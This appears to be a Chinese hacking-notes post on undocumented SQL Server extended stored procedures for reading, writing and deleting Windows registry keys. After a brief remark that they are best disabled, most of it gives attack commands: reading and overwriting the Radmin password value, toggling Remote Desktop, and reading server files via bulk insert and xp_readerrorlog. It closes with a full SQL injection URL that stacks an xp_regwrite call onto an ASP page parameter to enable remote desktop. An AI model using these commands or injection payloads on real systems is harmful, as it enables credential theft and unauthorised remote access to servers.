sql server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,
在sql server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的sql server版本中访问系统注册表的能力,
而且很多人利用sql server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在sql server中禁用他们.
xp_regenumvalues 以多个记录集方式返回所有键值
使用方法:
xp_regenumvalues 注册表根键, 子键
比如说,想看看hkey_local_machine\software\microsoft\windows\currentversion\run 的所有键值:
use master
exec xp_regenumvalues ‘hkey_local_machine’,’software\microsoft\windows\currentversion\run’
exec xp_regenumvalues ‘hkey_local_machine’,’system\radmin\v2.0\server\parameters’
xp_regread 返回制定键的值
使用方法:
xp_regread 根键,子键,键值名
use master
exec xp_regread ‘hkey_local_machine’,’software\microsoft\windows\currentversion’,’commonfilesdir’
exec xp_regread ‘hkey_local_machine’,’system\radmin\v2.0\server\parameters’,’parameter’
得到密码
exec xp_regread ‘hkey_local_machine’,’system\currentcontrolset\control\terminal server’,’fdenytsconnections’
远程桌面开启为0
xp_regwrite 写入注册表
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
use master
exec xp_regwrite ‘hkey_local_machine’,’software\microsoft\windows\currentversion’,’testvaluename’,’reg_sz’,’hello’
exec xp_regwrite ‘hkey_local_machine’,’system\radmin\v2.0\server\parameters’,’parameter’,’reg_binary’,0xd7b7cb315b4e731d8e9ef886ce6dcb23
exec xp_regwrite ‘hkey_local_machine’,’system\radmin\v2.0\server\parameters’,’parameter’,’reg_binary’,0xd7b7cb315b4e731d8e9ef886ce6dcb23;–
exec xp_regwrite ‘hkey_local_machine’,’system\radmin\v2.0\server\parameters’,’parameter’,’reg_binary’,”;–
必须清空后再写新数值
修改成功的前提是值为空
注意值类型有2种reg_sz 表示字符型,相当于新建字符串值,reg_dword 表示整型,相当于新建dword值
reg_binary
exec xp_regwrite ‘hkey_local_machine’,’system\currentcontrolset\control\terminal server’,’fdenytsconnections’,’reg_dword’,1;–
禁用远程桌面
xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue ‘hkey_local_machine’,’software\microsoft\windows\currentversion’,’testvaluename’
use master
exec xp_regdeletevalue ‘hkey_local_machine’,’system\radmin\v2.0\server\parameters’,’parameter’
xp_regdeletekey 删除键,包括该键下所有值
使用方法:
use master
xp_regdeletekey ‘hkey_local_machine’,’software\microsoft\windows\currentversion\testkey’
exec xp_regdeletekey ‘hkey_local_machine’,’system\radmin\v2.0\server\parameters’
运行前提sa
可能用处不是很大,也没深入研究,因为觉得读asp用xp_makecab更方便点,仅供思维扩展。
方法1.bulk insert aaa from ‘c:\1.txt’
方法2.xp_readerrorlog 1,’c:\1.txt’
开启远程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite ‘hkey_local_machine’,’system\currentcontrolset\control\terminal server’,’fdenytsconnections’,’reg_dword’,0;–